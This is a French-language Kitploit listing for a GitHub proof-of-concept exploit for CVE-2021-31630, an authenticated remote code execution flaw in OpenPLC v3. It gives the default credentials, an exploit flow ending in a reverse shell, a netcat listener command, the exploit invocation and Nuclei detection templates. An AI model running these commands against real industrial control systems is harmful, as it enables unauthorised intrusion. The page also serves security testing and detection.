Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
OpenPLC-CVE-2021-31630-RCE — Python 3.13+ proof-of-concept exploit for CVE-2021-31630, enabling authenticated remote code execution on OpenPLC v3 via malicious hardware layer upload. Includes Nuclei detection templates for default credentials and vulnerability checks. | Kitploit
Outils/GitHubGitHub/machevalia/openplc-cve-2021-31630-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationPayload Development
GitHubmachevalia/openplc-cve-2021-31630-rce

OpenPLC-CVE-2021-31630-RCE

Python 3.13+ proof-of-concept exploit for CVE-2021-31630, enabling authenticated remote code execution on OpenPLC v3 via malicious hardware layer upload. Includes Nuclei detection templates for default credentials and vulnerability checks.

Voir le dépôt
325il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

OpenPLC v3 RCE authentifié (CVE-2021-31630)

Ceci est un proof-of-concept moderne et compatible Python 3.13+ pour CVE-2021-31630, une vulnérabilité dans OpenPLC v3 qui permet à un utilisateur authentifié de téléverser une couche matérielle personnalisée contenant du code malveillant, conduisant à une exécution de code à distance (RCE) sur l'hôte.

Découverte originale de la vulnérabilité et avis par Fellipe Oliveira. Cette réimplémentation et modernisation utilise httpx, des outils en ligne de commande, la journalisation et des techniques de détection plus sûres.

Aperçu de l'exploit

  • Vulnérabilité : CVE-2021-31630
  • Composant : Serveur web OpenPLC v3
  • Impact : Exécution de code à distance authentifiée
  • Identifiants par défaut : openplc:openplc

Déroulement de l'exploit

  1. Connexion avec des identifiants valides
  2. Téléversement d'un code C malveillant en tant que couche matérielle personnalisée
  3. Déclenchement de la compilation
  4. Déclenchement de l'exécution (optionnel)
  5. Réception de la connexion reverse shell

Utilisation

  1. Démarrer un écouteur :
root@kitploit:~
nc -lvnp 9001
  1. Exécuter l'exploit :
root@kitploit:~
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001

Options facultatives :

  • -u Nom d'utilisateur (défaut : openplc)
  • -p Mot de passe (défaut : openplc)
  • -t Délai d'expiration en secondes (défaut : 20)

Fonctionnalités

  • Compatible avec Python 3.13+
  • Conçu avec httpx
  • Prise en charge de la journalisation pour une sortie propre
  • Fonctions modulaires pour une réutilisation plus facile
  • Modèles de détection Nuclei inclus

Modèles de détection Nuclei

  1. Vérification des identifiants par défaut
root@kitploit:~
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
  1. Vérification passive de la vulnérabilité RCE
root@kitploit:~
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080

Le deuxième modèle se connecte et tente un téléversement de charge utile inoffensive + compilation pour confirmer la vulnérabilité probable — sans déclencher une exécution de code réelle.

Fichiers inclus

  • OpenPLC_CVE_2021_31630.py – Exploit Python 3.13+
  • nuclei-templates/openplc-default-login.yaml – Détecte les identifiants par défaut
  • nuclei-templates/openplc-authenticated-rce-check.yaml – Détecte le comportement vulnérable en toute sécurité

⚠️ Légal / Éthique

Ce code est destiné uniquement à des tests de sécurité éducatifs et autorisés. Ne pas l'utiliser sans l'autorisation explicite du propriétaire du système.

Télécharger l’outil